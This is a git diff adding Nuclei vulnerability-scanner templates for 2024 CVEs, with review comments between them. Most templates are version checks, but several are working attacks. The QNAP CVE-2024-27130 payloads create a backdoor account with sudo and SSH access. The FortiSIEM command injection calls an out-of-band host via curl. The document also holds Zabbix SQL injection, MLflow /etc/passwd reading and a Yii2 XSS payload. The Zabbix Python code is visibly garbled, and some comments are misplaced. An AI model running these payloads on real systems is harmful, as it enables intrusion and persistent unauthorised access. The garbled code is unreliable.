diff --git a/poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml b/poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml new file mode 100644 index 0000000000..55bed6d7bc --- /dev/null +++ b/poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a + +info: + name: > + SMSAlert - WooCommerce <= 3.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via sa_subscribe Shortcode + author: topscoder + severity: low + description: > + The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_subscribe shortcode in all versions up to, and including, 3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10233 + metadata: + fofa-query: "wp-content/plugins/sms-alert/" + google-query: inurl:"/wp-content/plugins/sms-alert/" + shodan-query: 'vuln:CVE-2024-10233' + tags: cve,wordpress,wp-plugin,sms-alert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sms-alert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sms-alert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.5') \ No newline at end of file 
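Review bot: `severity: low` and the trailing `low` tag do not match the CVSS 6.4 (medium) score declared in `classification`; pick one rating and use it in both places. The detection is a readme.txt `Stable tag` comparison only — the sa_subscribe shortcode is never rendered — so a match should be described as "version in affected range" and `metadata` should carry `verified: false`. Readmes whose stable tag was not bumped with the release will mis-report in either direction; worth a one-line caveat in the description.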
diff --git a/poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml b/poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml new file mode 100644 index 0000000000..a49560c2e5 --- /dev/null +++ b/poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8 + +info: + name: > + Premium Addons for Elementor <= 4.10.60 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Video Box Widget + author: topscoder + severity: low + description: > + The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video Box widget in all versions up to, and including, 4.10.60 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6102c07-2776-4963-8d16-a779c5979275?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10266 + metadata: + fofa-query: "wp-content/plugins/premium-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-10266' + tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.10.60') \ No newline at end of file 
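Review bot: The description was copied from the shortcode templates and says "via the plugin's Video Box widget ... on user supplied attributes" while the title calls this a DOM-based stored XSS in a widget, not a shortcode; rewrite the description to match the title (the Wordfence entry linked in `reference` is the source to align with). Nothing in the request touches the Video Box widget — it is a `Stable tag` version comparison — so `metadata` should state `verified: false`. `severity: low` versus CVSS 6.4 is the same inconsistency as in the sibling files.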
diff --git a/poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml b/poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml new file mode 100644 index 0000000000..4c6a6f5788 --- /dev/null +++ b/poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48 + +info: + name: > + Exclusive Addons for Elementor <= 2.7.4 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.4 via the render function in elements/tabs/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc931943-13f3-4ab1-b70f-c234253ca269?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10312 + metadata: + fofa-query: "wp-content/plugins/exclusive-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/exclusive-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-10312' + tags: cve,wordpress,wp-plugin,exclusive-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/exclusive-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "exclusive-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file 
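Review bot: `severity: low` is assigned although the classification block carries CVSS 4.3 (medium) for an authenticated information exposure; make the two agree. The template does not touch `elements/tabs/tabs.php` or any template-rendering endpoint, it only parses readme.txt, so add `verified: false` to `metadata` and phrase the description as a version-range match. If the readme carries `Stable tag: trunk` the extractor yields nothing and the `and`-combined DSL matcher fails silently — say so or add a fallback.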
diff --git a/poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml b/poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml new file mode 100644 index 0000000000..368f26b40d --- /dev/null +++ b/poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10360-45e78583db6193210a4d94e69731df68 + +info: + name: > + Move Addons for Elementor <= 1.3.5 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes/widgets/accordion/widget.php, includes/widgets/remote-template/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10360 + metadata: + fofa-query: "wp-content/plugins/move-addons/" + google-query: inurl:"/wp-content/plugins/move-addons/" + shodan-query: 'vuln:CVE-2024-10360' + tags: cve,wordpress,wp-plugin,move-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/move-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "move-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml b/poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml new file mode 100644 index 0000000000..dbe9c032d9 --- /dev/null 
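Review bot: With `matchers-condition: and` the result hinges entirely on `compare_versions(version, '<= 1.3.5')`, where `version` is whatever the readme's `Stable tag` says — not the code actually running — so a readme that was not bumped with a release produces a false positive, and `Stable tag: trunk` produces a silent miss. State that limitation in the description and set `verified: false` in metadata, since no widget render path is exercised. `severity: low` also contradicts the CVSS 4.3 score declared above it.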
+++ b/poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb + +info: + name: > + WPC Smart Messages for WooCommerce <= 4.2.1 - Authenticated (Subscriber+) Local File Inclusion + author: topscoder + severity: low + description: > + The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.1 via the get_condition_value function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fd87512-def0-4e59-aa2d-b166919474f3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10436 + metadata: + fofa-query: "wp-content/plugins/wpc-smart-messages/" + google-query: inurl:"/wp-content/plugins/wpc-smart-messages/" + shodan-query: 'vuln:CVE-2024-10436' + tags: cve,wordpress,wp-plugin,wpc-smart-messages,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpc-smart-messages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file 
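Review bot: `severity: low` and the `low` tag are attached to a subscriber-level local file inclusion that the description itself says leads to PHP code execution and that is scored CVSS 8.8 (`C:H/I:H/A:H`) in the same block; this should be `severity: high` (and the tag updated) or the entry will be filtered out of every severity-gated scan. The check is only a readme `Stable tag` comparison and never calls `get_condition_value`, so mark `verified: false` and describe it as a version-range match. The same `Stable tag: trunk` blind spot as the other templates applies.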
diff --git a/poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml b/poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml new file mode 100644 index 0000000000..2af68292b6 --- /dev/null +++ b/poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062 + +info: + name: > + WPC Smart Messages for WooCommerce <= 4.2.1 - Missing Authorization to Authenticated (Subscriber+) Message Activation/Deactivation + author: topscoder + severity: low + description: > + The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to unauthorized Smar Message activation/deactivation due to a missing capability check on the ajax_enable function in all versions up to, and including, 4.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or deactivate smart messages. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4acb4fda-0217-44b9-a85e-64807eb4a011?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10437 + metadata: + fofa-query: "wp-content/plugins/wpc-smart-messages/" + google-query: inurl:"/wp-content/plugins/wpc-smart-messages/" + shodan-query: 'vuln:CVE-2024-10437' + tags: cve,wordpress,wp-plugin,wpc-smart-messages,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpc-smart-messages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-21520.yaml b/poc/cve/CVE-2024-21520.yaml new file mode 100644 index 0000000000..98b797ff9c --- /dev/null +++ b/poc/cve/CVE-2024-21520.yaml 
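Review bot: The description contains the typo "unauthorized Smar Message activation/deactivation" — "Smart Message". `severity: low` disagrees with the CVSS 4.3 (medium) score declared in `classification`; align them. As with CVE-2024-10436 in the same plugin, the template fingerprints readme.txt and does not call `ajax_enable`, so add `verified: false` to `metadata` and phrase the description as a version-range match.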
@@ -0,0 +1,45 @@ +id: CVE-2024-21520 + +info: + name: Django Break Long Headers - Cross-site Scripting + author: sim4110,KoYejune0302,gy741,cheoljun99 + severity: medium + description: | + Versions of the package djangorestframework before 3.15.2 are vulnerable to Cross-site Scripting (XSS) via the break_long_headers template filter due to improper input sanitization before splitting and joining with
tags. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-21520 + - https://security.snyk.io/vuln/SNYK-PYTHON-DJANGORESTFRAMEWORK-7252137 + - https://github.com/encode/django-rest-framework/commit/3b41f0124194430da957b119712978fa2266b642 + - https://github.com/encode/django-rest-framework/compare/3.15.1...3.15.2 + - https://github.com/encode/django-rest-framework/pull/9435 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-21520 + cwe-id: CWE-79 + epss-score: 0.00045 + epss-percentile: 0.16371 + tags: cve,cve2024,xss,django + +http: + - raw: + - | + GET {{BaseURL}}?{{param_name}}=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "," + + - type: word + part: body + words: + - '"OK"' + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2024-22120.yaml b/poc/cve/CVE-2024-22120.yaml new file mode 100644 index 0000000000..b21744ef6d --- /dev/null +++ b/poc/cve/CVE-2024-22120.yaml 
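Review bot: The header matcher `- ","` is satisfied by nearly every HTTP response because the standard `Date:` header contains a comma, so combined with `"OK"` in the body and status 200 this template will flag any JSON endpoint as vulnerable regardless of the DRF version or whether `break_long_headers` is used at all. `{{param_name}}` is also not declared under `variables:`, so the literal text is sent unless the operator passes `-var param_name=...`; declare it with a default and document that it must be a parameter the browsable API renders into a header. A faithful check looks for the filter's own output — the long value split on `,` and joined with HTML line-break tags — in an HTML body, e.g. `part: body`, `words: ["aaaaaaaaaa<br"]`, plus `text/html` in the header.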
@@ -0,0 +1,53 @@ +id: cve-2024-22120 + +info: + name: Zabbix Server - Authenticated Time-Based Blind SQL injection + author: CodeStuffBreakThings + description: Zabbix server can perform command execution for configured scripts. After a command is executed, an audit entry is added to "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability. + severity: critical + remediation: Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2 + reference: + - https://support.zabbix.com/browse/ZBX-24505#/ + - https://github.com/W01fh4cker/CVE-2024-22120-RCE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-22120 + tags: zabbix,sqli,cve,cve2024,cve-2024-22120 + +variables: + HOST: "{{Host}}" + PORT: "{{Port}}" + SID: "{{SID}}" + HOSTID: "{{HOSTID}}" + +code: + - engine: + - py + - python3 + source: | + import os, struct, socket + from datetime import datetime + hostname=os.getenv('HOST') + port=int(os.getenv('PORT')) + sid=os.getenv('SID') + hostid=os.getenv('HOSTID') + zbx_header = "ZBXD\x01".encode() + message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}" + message_length = struct.pack('= 10 and zbx_header in response: + print("Vulnerable to CVE-2024-22120") + + matchers: + - type: word + words: + - "Vulnerable to CVE-2024-22120" diff --git a/poc/cve/CVE-2024-23108.yaml b/poc/cve/CVE-2024-23108.yaml new file mode 100644 index 0000000000..5d319621ab --- /dev/null +++ b/poc/cve/CVE-2024-23108.yaml 
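Review bot: As committed the Python source is not valid — `message_length = struct.pack('= 10 and zbx_header in response:` shows the pack format string, the send/recv logic and the elapsed-time comparison collapsed into one line; if that is an HTML-stripping artefact of this page it still needs to be confirmed against the file, because the template cannot run otherwise. The probe injects `(select sleep(10))` via `clientip` and executes `scriptid` 3 against `hostid`, i.e. it writes an audit-log row and runs a script on a real host, so it needs the `intrusive` tag plus a note that `SID` and `HOSTID` must be supplied with `-var` (the `variables:` block only references itself). `id: cve-2024-22120` is lowercase while every other template in the batch uses `CVE-`, which breaks id-based lookups.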
@@ -0,0 +1,50 @@ +id: CVE-2024-23108 + +info: + name: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection - CVE-2024-23108 + author: thacien + severity: critical + description: An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1, 7.0.0 through 7.0.2, 6.7.0 through 6.7.8, 6.6.0 through 6.6.3, 6.5.0 through 6.5.2, and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests. + impact: Successful exploitation of this vulnerability could allow an unauthenticated attacker to execute arbitrary code on the affected system. + remediation: upgrade to FortiSIEM version >=6.4.4, >=6.5.3, >=6.6.4, >=6.7.9, >=7.0.3, >=7.1.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-23108 + - https://github.com/horizon3ai/CVE-2024-23108 + - https://www.horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive + - https://www.fortiguard.com/psirt/FG-IR-23-130 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-23108 + cwe-id: CWE-78 + epss-score: 0.00078 + cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* +metadata: + verified: false + max-request: 1 + vendor: fortinet + product: fortisiem + tags: CVE-2024-23108,fortisiem,network,cve,fortinet,rce,tcp,unauth +variables: + # generate the payload to send a curl request to an OOB server + - exploit: '\n 127.0.0.1\n /test; curl -k "{{interactsh_url}}";\n\n' + - payload: '{{51000000 + hex_encode(len("{{exploit}}")) + 0000006f421e4000000000}}' +tcp: + - host: + - "tls://{{Hostname}}" + port: 7900 + # send payload with exploit + inputs: + - data: '{{hex_decode("{{payload}}") + exploit}}' + read-size: 2048 + matchers-condition: and + # if oob server receives and http request + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - type: status + part: 
interactsh_request + status: + - 200 diff --git a/poc/cve/CVE-2024-27130.yaml b/poc/cve/CVE-2024-27130.yaml new file mode 100644 index 0000000000..b63847d769 --- /dev/null +++ b/poc/cve/CVE-2024-27130.yaml @@ -0,0 +1,49 @@ +id: CVE-2024-27130 + +info: + name: Remote Code Execution in NAS File Management in QNAP QuTSCloud c5.1.7.2739 build 20240419 + author: colcs25 + severity: high + description: This template checks for Remote Code Execution (RCE) vulnerability via Buffer Overflow in NAS file management via the ssid parameter. + command -> nuclei -t CVE-2024-27130.yaml -u (target URL) -var ssid=(ssid value) + tags: rce, cve + remediation: Fixed in QTS 5.1.7.2770 build 20240520 + reference: + - https://github.com/watchtowrlabs/CVE-2024-27130 + - https://labs.watchtowr.com/qnap-qts-qnapping-at-the-wheel-cve-2024-27130-and-friends/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-27130 + classification: + cve-id: CVE-2024-27130 + cve-Base-Score: 7.2 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L + +requests: + - raw: + - | + POST /cgi-bin/filemanager/share.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Connection: close + + ssid={{ssid}}&func=get_file_size&total=1&path=/&name={{payload}} + attack: pitchfork + payloads: + payload: + - "/../../../../usr/local/bin/useradd -p '$(openssl passwd -6 password)' watchtowr #" + - "/bin/sed -i -e 's/AllowUsers /AllowUsers watchtowr /' /etc/config/ssh/sshd_config #" + - "/../../../../bin/echo watchtowr ALL=\\(ALL\\) ALL >> /usr/etc/sudoers #" + - "/../../../../usr/bin/killall -SIGHUP sshd #" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HTTP/1.1 200 OK" + part: header + extractors: + - type: regex + part: body + regex: + - "watchtowr" diff --git a/poc/cve/CVE-2024-2928.yaml b/poc/cve/CVE-2024-2928.yaml new file mode 100644 index 0000000000..919025c5b7 --- /dev/null +++ b/poc/cve/CVE-2024-2928.yaml 
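Review bot: The last matcher, `type: status` with `part: interactsh_request`, is not a valid combination — a status matcher inspects the HTTP response code, not interactsh data — and under `matchers-condition: and` it can never be satisfied, so the template reports nothing even when the curl callback arrives. Drop it or replace it with `type: word`, `part: interactsh_request`, `words: ["GET /"]`. `variables:` is also written as a YAML list (`- exploit:`) where nuclei expects a map, and the `payload` expression adds the unquoted tokens `51000000` and `0000006f421e4000000000` as if they were strings; quote them and confirm that `hex_encode(len(...))` yields the binary length field the phMonitor header expects rather than the ASCII hex of the decimal digits (verify against the horizon3 PoC in `reference`).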
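Review bot: This template is not a detection check but a persistence implant: the four payloads create a `watchtowr` account with password `password`, add it to sshd `AllowUsers`, append a sudoers rule and HUP sshd on every host that answers, and nothing removes any of it afterwards. A scanner template must not leave a backdoor — replace the commands with one harmless probe such as `/bin/echo {{randstr}}` (or a `curl {{interactsh_url}}` callback) and match on the marker, and add `intrusive` to the tags at minimum. The matchers as written (status 200 and `HTTP/1.1 200 OK` in the header) are satisfied by any successful response, so they verify nothing, and `requests:` is the deprecated spelling of `http:`. `tags: rce, cve` with spaces and a 7.2 score paired with `C:N/I:L/A:L` metrics also need correcting.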
@@ -0,0 +1,69 @@ +id: CVE-2024-2928 + +info: + name: MLflow - LFI Exploitation + author: jyjyjy25, gy741, oriing, ANseunghyeon, woo4826 + severity: high + description: | + This template detects Local File Read (LFI) vulnerabilities in MLflow due to URI fragment parsing confusion. + impact: | + Successful exploitation could allow an attacker to read arbitrary files such as /etc/passwd in the local file system. + remediation: | + Upgrade MLflow to version up to 2.11.3. + reference: + - https://huntr.com/bounties/19bf02d7-6393-4a95-b9d0-d6d4d2d8c298 + - https://nvd.nist.gov/vuln/detail/CVE-2024-2928 + tags: mlflow,lfi,cve,cve2024 + +http: + - raw: + - | + POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"name": "poc", "artifact_location": "http:\/\/\/#\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/"} + + extractors: + - type: json + part: experiment_id + + - raw: + - | + POST /api/2.0/mlflow/runs/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"experiment_id": "{{experiment_id}}"} + + extractors: + - type: json + part: run.info.run_uuid + + - raw: + - | + POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"name": "poc"} + + - raw: + - | + POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + {"name": "poc", "run_id": "{{run_id}}", "source": "file:///etc/"} + + - raw: + - | + GET /model-versions/get-artifact?path=passwd&name=poc&version=1 HTTP/1.1 + Host: http://127.0.0.1:5000 + Content-Type: application/json + + + matchers: + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/cve/CVE-2024-32877.yaml b/poc/cve/CVE-2024-32877.yaml new file mode 100644 index 0000000000..2e2b39f64b --- /dev/null +++ b/poc/cve/CVE-2024-32877.yaml 
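Review bot: Every raw request hard-codes `Host: http://127.0.0.1:5000` instead of `Host: {{Hostname}}`, so real targets receive a wrong (and syntactically invalid) Host header; use `{{Hostname}}` throughout. The extractors are also not in nuclei's shape — `type: json` needs a `name:` and a `json:` list of expressions with `part: body`, whereas here `part: experiment_id` / `part: run.info.run_uuid` are given with no name — so `{{experiment_id}}` and `{{run_id}}` (which does not even match the extracted key) stay unresolved and the chain breaks at step two. The sequence creates an experiment, a run and a registered model named `poc` and then reads `/etc/passwd`, so it is state-changing and needs the `intrusive` tag; a fixed name also collides on a rerun, where `version=1` is no longer the new artifact, so use `{{randstr}}` for `name`. The remediation line should read "upgrade to 2.11.3 or later", not "up to".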
@@ -0,0 +1,38 @@ +id: CVE-2024-32877 + +info: + name: Yii2 2.0.49.3 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Yii 2 is a PHP application framework. During internal penetration testing of a product based on Yii2, users discovered a Cross-site Scripting (XSS) vulnerability within the framework itself. This issue is relevant for the latest version of Yii2 (2.0.49.3). This issue lies in the mechanism for displaying function argument values in the stack trace. The vulnerability manifests when an argument's value exceeds 32 characters. For convenience, argument values exceeding this limit are truncated and displayed with an added "...". The full argument value becomes visible when hovering over it with the mouse, as it is displayed in the title attribute of a span tag. However, the use of a double quote (") allows an attacker to break out of the title attribute's value context and inject their own attributes into the span tag, including malicious JavaScript code through event handlers such as onmousemove. This vulnerability allows an attacker to execute arbitrary JavaScript code in the security context of the victim's site via a specially crafted link. 
+ reference: + - https://github.com/yiisoft/yii2/security/advisories/GHSA-qg5r-95m4-mjgj + - https://nvd.nist.gov/vuln/detail/CVE-2024-32877 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Yii Framework" + tags: cve,cve2024,yiisoft,yii2,xss + +http: + - method: GET + path: + - "{{BaseURL}}/about/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%22%20onmousemove=alert(1)%20style=%22width:%20100000px;%20height:%20100000px;%20position:%20absolute;%20top:%20-10000px;%20left:%200;%22" + - "{{BaseURL}}/site/about/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%22%20onmousemove=alert(1)%20style=%22width:%20100000px;%20height:%20100000px;%20position:%20absolute;%20top:%20-10000px;%20left:%200;%22" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmousemove=alert(1)' + - 'Yii' + condition: and + case-insensitive: true + + - type: word + part: header + words: + - "text/html" diff --git a/poc/cve/CVE-2024-38653.yaml b/poc/cve/CVE-2024-38653.yaml new file mode 100644 index 0000000000..111513bd22 --- /dev/null +++ b/poc/cve/CVE-2024-38653.yaml 
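Review bot: The body matcher looks for the bare substring `onmousemove=alert(1)`, which is also present when Yii escapes the reflected value correctly (`&quot; onmousemove=alert(1)`), so a patched site that still echoes the argument in its stack trace would be reported as vulnerable. Require the actual attribute break-out, e.g. `words: ['a" onmousemove=alert(1)']` or a regex `title="[^"]*a" onmousemove=alert\(1\)`, so an unescaped double quote is mandatory. The probe can only work where the framework renders argument values in a stack trace — presumably only with the debug exception page enabled — and that precondition belongs in the description.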
